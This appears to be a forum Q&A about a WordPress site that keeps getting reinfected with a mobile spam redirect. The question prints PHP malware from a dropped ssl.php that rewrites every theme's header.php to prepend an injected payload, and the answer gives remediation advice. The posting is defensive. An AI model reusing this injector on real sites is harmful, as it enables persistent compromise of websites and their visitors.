How to stop repeated hack on header.php of custom theme?

Noticed some unwanted files on the website root folder and removed them. I have found that header.php file has some malicious code which redirects to spam sites only on mobile browsers.

when these files exists .htaccess pretty permalinks does not work.

I have changed Cpanel, FTP passwords.Deleted these below listed unwanted files. Scanned all the files and folders.

After a clean installation of wordpress and plugins, these files are added repeatedly.

Server: shared hosting / linux server File Transers using Cpanel / FileZilla

How to stop these repeated attacks?

The list of malicious scripts.

ssl.php has these following code

if (file_exists("wp-content"))
{
if (file_exists("wp-content/themes"))
{
    $dirs = scandir("wp-content/themes");
    foreach ($dirs as $dir)
    {
        if ((is_dir("wp-content/themes/$dir")) AND ($dir !== ".") AND ($dir !== "..")) 
        {
            if (file_exists("wp-content/themes/$dir/header.php")) 
            {
                          $file = fopen("wp-content/themes/".$dir."/header.php", "r");  
                          $buffer = fread($file, filesize("wp-content/themes/".$dir."/header.php")); 
                          fclose($file);    
               if (eregi('ba9hus.in', $buffer)==0) 
               { 

                            $in = fopen("wp-content/themes/".$dir."/header.php", "w");
                             fwrite($in, $code);
                             fwrite($in, $buffer);
                             fclose($in);
                /*       
                   $in = fopen("wp-content/themes/$dir/header.php", "a");
                   fwrite($in, $code);
                   fclose($in);
                   */
               }
            }
        }
    }
}
}

ssl.php
wp-ssl.php
wp-ssl.zip
news_parser.class.php

Topic hacks hacked security ftp Wordpress

Category Web

1
answered at

Check permissions on all WP folders. Check the htaccess file. Delete any unknown files throughout your hosting area. (Carefully.) Change all of your hosting passwords (including FTP accounts; delete any you don't know). Strong passwords!

Reinstall WP (from your admin - Dashboard, Updates). Reinstall all themes (deactivate, uninstall, reinstall, reactivate). Same for plugins (although header.php is probably in your theme files).

Lots of advice on the googles about recovering a hacked WP install (filter your search by 'last year').

You could also do a brand-new WP install in a separate folder on your hosting account. More work involved here, as you'll need to adjust domain settings, copy data (Tools, Export, then Tools, Import), and re-do all theme and plugin settings.

Be wary of any plugins/themes that you recently installed. Make sure everything is current (WP, themes, plugins). Also check your local computer for weirdness (like updating local OS and apps).

Change passwords everywhere (hosting account, WP, databases, FTP, email) on hosting account. And locally on your computer.

Good luck.

Personal opinion follows

(BTW, I stopped using FileZilla a couple of years ago when I found out they stored credentials - user/pass - in a plain text file easily accessable on your local PC. Haven't used them since, don't know if they fixed it; back then they didn't see that as a vuln. Use WinSCP now. Your mileage may vary.)

About

Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.